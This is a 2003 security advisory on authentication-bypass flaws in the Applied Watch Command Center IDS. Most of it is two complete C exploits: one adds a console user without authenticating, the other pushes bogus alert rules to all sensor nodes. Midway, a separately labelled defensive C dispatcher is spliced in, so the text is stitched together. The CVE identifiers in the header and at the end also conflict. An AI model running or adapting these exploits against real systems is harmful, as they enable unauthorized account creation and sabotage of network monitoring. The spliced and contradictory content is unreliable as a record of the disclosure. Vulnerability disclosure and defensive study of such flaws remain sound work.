
_BSSADV-0000.txt
Posted Dec 1, 2003
Authored by The Bugtraq Team | Site bugtraq.org

Bugtraq Security Systems Security Advisory - Multiple vulnerabilities have been discovered in the Applied Watch Command Center IDS. Two exploits have been released to demonstrate these flaws. The first, appliedsnatch.c, allows a remote attacker to add a user to the console without having to authenticate to the system. The second, addrule.c, allows a remote attacker to add custom IDS alerts to all sensor nodes in a network, enabling a human denial-of-service attack by making good packets look bad.

tags | exploit, remote, vulnerability
advisories | CVE-2003-0970, CVE-2003-0971
SHA-256 | 89d611aba3b2b3bd598156b14a689aeb759d16617579758d1bce7e8b845eb94c


Bugtraq Security Systems, Incorporated
www.bugtraq.org

Security Advisory

Advisory Name: Multiple Issues in Applied Watch Command Center
Release Date: 11/27/2003
Application: Applied Watch
Platform: Linux (IA32)
Linux (sparc)
Linux (sparc64)
Linux (hppa)
Linux (ppc)
Linux (xbox)
Linux (IA64)
SUN Solaris (IA32)
SUN Solaris (sparc)
SUN Solaris (sparc64)
OpenBSD (386)
HPUX (hppa)
HPUX (IA64)
Compaq Tru64
Microsoft Windows NT (Alpha)
Microsoft Windows NT (IA32)
Severity: Secure protocol implementation weaknesses, allows for
authentication bypass and compromise of IDS nodes.
Author: The Bugtraq Team, Collectively [bugtraq@bugtraq.org]
Vendor Status: Patches pending.
CVE Candidate: CAN-2003-0970 - Authentication Bypass to Add IDS Rules
CAN-2003-0971 - Authentication Bypass to Add Users
Reference: www.bugtraq.org/advisories/_BSSADV-0000.txt


Overview:
The Applied Watch Command Center boasts the industry's first
truly OS-native platform for managing network threats in real-time. It
frees users from the unreliable, more difficult, and less secure
Web-based monitoring environment of Snort IDS sensors. From a central
desktop console supporting Mac, Linux, Unix, and Windows, thousands of
IDS agents and the server can be monitored. The Command Center gives
you these benefits:

1. Interprets alerts generated by third-party solutions, parsing
the alerts into high, medium, and low priority;
2. Allows you to identify false positives;
3. Lets you store notes on events to prevent duplication of
effort, saving valuable man-hours;
4. Provides greater security with an OS-native, desktop console;
5. Lets you avoid the high cost of Security Information Management
Systems (SIMs); and
6. Reduces your IDS cost of ownership.

It should also be noted that the lead developer of this system is
named Jason Ish, who is a member of the core OpenBSD development team
and is therefore a security expert. He has a son named Theo, named after
the great pioneer of proactive security, Theo de Raadt.

There exist a number of vulnerabilities in the various components
of the Applied Watch software suite; this advisory is the first of
many to come regarding the logic-related security vulnerabilities
in the software. After all such problems are eliminated from the codebase,
we will begin releasing another set of advisories concerning multiple
instances in the code that allow for the remote execution of arbitrary code
throughout the various components of this system.


Details:

[1] Adding a User

Using the attached program, appliedsnatch.c, a malicious individual on a
network protected by the Applied Watch Solution can add new users to a
console, without having to authenticate to the system.

--- begin appliedsnatch.c ---

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>

#define PUT_UINT32(i, val)\
{\
buf[(i) ++] = ((val) >> 24) & 0xff;\
buf[(i) ++] = ((val) >> 16) & 0xff;\
buf[(i) ++] = ((val) >> 8) & 0xff;\
buf[(i) ++] = (val) & 0xff;\
}

int main(int argc, char *argv[])
{
unsigned char *buf;
unsigned int idx, i;
size_t userlen, passlen, buflen, lenidx;
int sock;
struct sockaddr_in sin;
unsigned char respbuf[28];
ssize_t n;
SSL_CTX *sslctx;
SSL *ssl;

if (argc != 5) { fprintf(stderr, "usage: %s <host> <port> <user> <pass>\n", argv[0]); exit(1); }
userlen = strlen(argv[3]);
passlen = strlen(argv[4]);
buf = malloc(buflen = 12 + 4 + userlen + 4 + 4 + passlen + 4 + 4 + 4);
memset(buf, 0, buflen);
idx = 0;
PUT_UINT32(idx, 0xbabe0001); /* 0xbabe0002 for other protocol ver */
PUT_UINT32(idx, 0x6a);
lenidx = idx;
PUT_UINT32(idx, 0xf00fc7c8);
//PUT_UINT32(idx, 0); /* uncomment for other protocol ver */
PUT_UINT32(idx, userlen);
memcpy(&buf[idx], argv[3], userlen); idx += userlen;
idx |= 3; idx ++;
PUT_UINT32(idx, passlen);
memcpy(&buf[idx], argv[4], passlen); idx += passlen;
idx |= 3; idx ++;
PUT_UINT32(idx, 0x1);
PUT_UINT32(idx, 0x1);
PUT_UINT32(lenidx, idx);
printf("connecting\n");
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(atoi(argv[2]));
if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == -1)
{
struct hostent *he;

if ((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); }
memcpy(&sin.sin_addr, he->h_addr, 4);
}
sock = socket(AF_INET, SOCK_STREAM, 0);
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) { perror("connect()"); exit(1); }
printf("doing ssl handshake\n");
SSL_load_error_strings();
SSL_library_init();
if ((sslctx = SSL_CTX_new(SSLv23_client_method())) == NULL) { fprintf(stderr, "SSL_CTX_new()\n"); exit(1); }
if ((ssl = SSL_new(sslctx)) == NULL) { fprintf(stderr, "SSL_new()\n"); exit(1); }
if (SSL_set_fd(ssl, sock) != 1) { fprintf(stderr, "SSL_set_fd()\n"); exit(1); }
if (SSL_connect(ssl) != 1) { fprintf(stderr, "SSL_connect()\n"); exit(1); }
printf("sending %u bytes:\n", idx);
for (i = 0; i < idx; i ++) printf("%.2x ", buf[i]);
if (SSL_write(ssl, buf, idx) != idx) { perror("write()"); exit(1); }
printf("\nreading:\n");
i = 0;
/* accumulate until the full 28-byte response has arrived; a return of 0 means the peer closed */
while (i < sizeof(respbuf))
{
if ((n = SSL_read(ssl, &respbuf[i], sizeof(respbuf) - i)) <= 0) { fprintf(stderr, "SSL_read() failed or connection closed\n"); exit(1); }
i += n;
}
for (i = 0; i < sizeof(respbuf); i ++) printf("%.2x ", respbuf[i]);
printf("\n");
printf("adding user \"%s\" with password \"%s\" %s\n", argv[3], argv[4], (memcmp(&respbuf[16], "\x00\x00\x00\x00", 4) == 0)? "succeeded" : "failed");
SSL_shutdown(ssl);
close(sock);
return 0;
}

--- end appliedsnatch.c ---


[2] Adding a Rule

Using the second attached program, addrule.c, a malicious individual can
introduce custom IDS alerts to all sensor nodes on a network, allowing a
human denial-of-service attack against the security experts monitoring the
console. This is a valid technique for subverting intrusion detection
systems. This is also a demonstration of the "sometimes good packets look
like bad packets, while bad packets go unnoticed by the intrusion detection
system" concept.

--- begin addrule.c ---

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>

#define PUT_UINT32(i, val)\
{\
buf[(i) ++] = ((val) >> 24) & 0xff;\
buf[(i) ++] = ((val) >> 16) & 0xff;\
buf[(i) ++] = ((val) >> 8) & 0xff;\
buf[(i) ++] = (val) & 0xff;\
}

int main(int argc, char *argv[])
{
unsigned char *buf;
unsigned int idx, i;
size_t rulelen, buflen, lenidx;
int sock;
struct sockaddr_in sin;
unsigned char respbuf[28];
ssize_t n;
SSL_CTX *sslctx;
SSL *ssl;
const char *ruleset = "alert tcp any any -> any any (msg: \"*GOBBLE* *GOBBLE* *GOBBLE* *GOBBLE* \\:PpppppPPppppppPPPPPPpppp\";)";

if (argc != 3) { fprintf(stderr, "usage: %s <host> <port>\n", argv[0]); exit(1); }
rulelen = strlen(ruleset);
buf = malloc(buflen = 12 + 4 + 4 + 4 + rulelen + 4);
memset(buf, 0, buflen);
idx = 0;
PUT_UINT32(idx, 0xbabe0001); /* 0xbabe0002 for other protocol ver */
PUT_UINT32(idx, 0x6f);
lenidx = idx;
PUT_UINT32(idx, 0xf00fc7c8);
//PUT_UINT32(idx, 0); /* uncomment for other protocol ver */
PUT_UINT32(idx, 0);
PUT_UINT32(idx, 1);
PUT_UINT32(idx, rulelen);
memcpy(&buf[idx], ruleset, rulelen); idx += rulelen;
idx |= 3; idx ++;
PUT_UINT32(lenidx, idx);
printf("connecting\n");
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(atoi(argv[2]));
if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == -1)
{
struct hostent *he;

if ((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); }
memcpy(&sin.sin_addr, he->h_addr, 4);
}
sock = socket(AF_INET, SOCK_STREAM, 0);
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) { perror("connect()"); exit(1); }
printf("doing ssl handshake\n");
SSL_load_error_strings();
SSL_library_init();
if ((sslctx = SSL_CTX_new(SSLv23_client_method())) == NULL) { fprintf(stderr, "SSL_CTX_new()\n"); exit(1); }
if ((ssl = SSL_new(sslctx)) == NULL) { fprintf(stderr, "SSL_new()\n"); exit(1); }
if (SSL_set_fd(ssl, sock) != 1) { fprintf(stderr, "SSL_set_fd()\n"); exit(1); }
if (SSL_connect(ssl) != 1) { fprintf(stderr, "SSL_connect()\n"); exit(1); }
printf("sending %u bytes:\n", idx);
for (i = 0; i < idx; i ++) printf("%.2x ", buf[i]);
if (SSL_write(ssl, buf, idx) != idx) { perror("write()"); exit(1); }
printf("\nreading:\n");
i = 0;
/* accumulate until the full 28-byte response has arrived; a return of 0 means the peer closed */
while (i < sizeof(respbuf))
{
if ((n = SSL_read(ssl, &respbuf[i], sizeof(respbuf) - i)) <= 0) { fprintf(stderr, "SSL_read() failed or connection closed\n"); exit(1); }
i += n;
}
for (i = 0; i < sizeof(respbuf); i ++) printf("%.2x ", respbuf[i]);
printf("\n");
printf("adding nasty ruleset %s\n", (memcmp(&respbuf[16], "\x00\x00\x00\x00", 4) == 0)? "succeeded" : "failed");
SSL_shutdown(ssl);
close(sock);
return 0;
}

--- end addrule.c ---
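The frame layout both programs above build (magic word, command id, total length, a fixed token, then length-prefixed fields padded to 4-byte boundaries) is exactly what a console-side handler has to parse. As an added example that is not part of this advisory or of the vendor's code, here is a hardened dispatcher in C that validates that framing with bounds checks and refuses the add-user (0x6a) and add-rule (0x6f) commands unless session state says the client has authenticated. The session struct, the return codes and the 40-byte sample frame are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
/* Frame layout as built by both exploits above (all fields big-endian): [magic][command id]
 * [total length][fixed token], then command-specific fields. A string field is a 4-byte
 * length, the bytes, then padding to the next 4-byte boundary. */
#define FRAME_MAGIC  0xbabe0001u
#define CMD_ADD_USER 0x6au
#define CMD_ADD_RULE 0x6fu
struct session { int authenticated; };   /* hypothetical server-side session state */

static uint32_t get_u32(const unsigned char *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}
/* Parse one string field at 'off'; return the offset of the next field, or 0 if the
 * field (or its padding) would run past the end of the frame. */
static size_t read_field(const unsigned char *buf, size_t len, size_t off, uint32_t *outlen) {
    if (off + 4 > len) return 0;
    uint32_t n = get_u32(buf + off);
    off += 4;
    if (n > len - off) return 0;
    *outlen = n;
    off = ((off + n) | 3) + 1;            /* the rounding the exploits use: idx |= 3; idx++ */
    return off <= len ? off : 0;
}

/* Hardened dispatcher: the fixed token at bytes 12..15 proves nothing, so privileged commands
 * are gated on session state. Returns 0 = accepted, -1 = malformed/unknown, -2 = not authenticated. */
int handle_frame(const struct session *s, const unsigned char *buf, size_t len) {
    if (len < 16 || get_u32(buf) != FRAME_MAGIC || get_u32(buf + 8) != len) return -1;
    uint32_t cmd = get_u32(buf + 4), n = 0;
    if (cmd != CMD_ADD_USER && cmd != CMD_ADD_RULE) return -1;
    if (!s->authenticated) return -2;      /* the check the advisory reports as missing */
    size_t off = 16;
    if (cmd == CMD_ADD_USER) {             /* username, password, then two flag words */
        if (!(off = read_field(buf, len, off, &n)) || n == 0) return -1;
        if (!(off = read_field(buf, len, off, &n)) || n == 0) return -1;
        return off + 8 == len ? 0 : -1;
    }
    off += 8;                              /* add rule: two flag words precede the rule text */
    if (!(off = read_field(buf, len, off, &n)) || n == 0) return -1;
    return off == len ? 0 : -1;
}

static const unsigned char SAMPLE_ADD_USER[40] = {   /* constructed add-user frame: "bob" / "pw" */
    0xba,0xbe,0x00,0x01, 0x00,0x00,0x00,0x6a, 0x00,0x00,0x00,0x28, 0xf0,0x0f,0xc7,0xc8,
    0x00,0x00,0x00,0x03, 'b','o','b',0x00,  0x00,0x00,0x00,0x02, 'p','w',0x00,0x00,
    0x00,0x00,0x00,0x01, 0x00,0x00,0x00,0x01 };
int check_sample(int authenticated, size_t len) {   /* len < 40 simulates a truncated frame */
    struct session s = { authenticated };
    return handle_frame(&s, SAMPLE_ADD_USER, len);
}
```

The same session gate applies to any other privileged command the console exposes; the point is that nothing carried inside the frame itself can stand in for an authenticated session.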


Vendor Response:
Bugtraq Security has attempted to contact the vendor multiple
times since the discovery of these vulnerabilities, without success. A
public statement issued by the founder of the company, Eric Hines, helps
us understand why the company was unavailable for comment at the time:

"You've got to realize that these people are walking around with
exploits that vendors haven't even heard of yet. They're pissed and
they've got this almost God-like power that enables them to break into
any network that they want," Hines said. He reported that FateLabs.com
was knocked offline last week by a denial-of-service attack immediately
after the security firm published an advisory about a security bug.

We expect that once their network recovers from that incident they
will issue binary patches to their clients and help reduce the threat of
compromise against those networks. Undoubtedly they are already aware of
these vulnerabilities, and were hoping they would be brought to public
attention since, according to their website, they are "soldiers for full
disclosure".

ThreatCon:
The release of this information and exploits increases the Global
ThreatCon Level to a record-breaking index of 9/13 (more dangerous than
normal) level. We hope that Applied Watch will release their patches
soon so that the ThreatCon can be lowered to a more reasonable level. If
you have any questions regarding the Global ThreatCon, please visit
http://www.bugtraq.org/threatcon.html


Recommendation:
If the security of your network is required, Fatelabs / AppliedWatch
products should be removed or disabled on the hosts in question. If it is
not, enterprises should deploy vendor patches for the above vulnerabilities
when they become available. In addition, enterprises should remove all
default services that are not required on production systems, adequately
protect those that are required, and undertake other obvious security
measures.

Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues. These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

CAN-2003-0960 - Logical error in Applied Watch Console allowing user-adds
CAN-2003-0961 - Logical error in Applied Watch Nodes allowing rule-adds

Bugtraq Security Systems Vulnerability Reporting Policy:
http://www.bugtraq.org/research/policy/

Bugtraq Security Systems Advisory Archive:
http://www.bugtraq.org/advisories.html

Bugtraq Security Systems PGP Key:
http://www.bugtraq.org/pgp_key.asc

Bugtraq Security Systems is currently seeking application security experts
to fill several consulting positions. Applicants should have strong
application development skills and be able to perform application security
design reviews, code reviews, and application penetration testing. Please
send resumes to jobs@bugtraq.org

Copyright 2003 Bugtraq Security Systems. All rights reserved.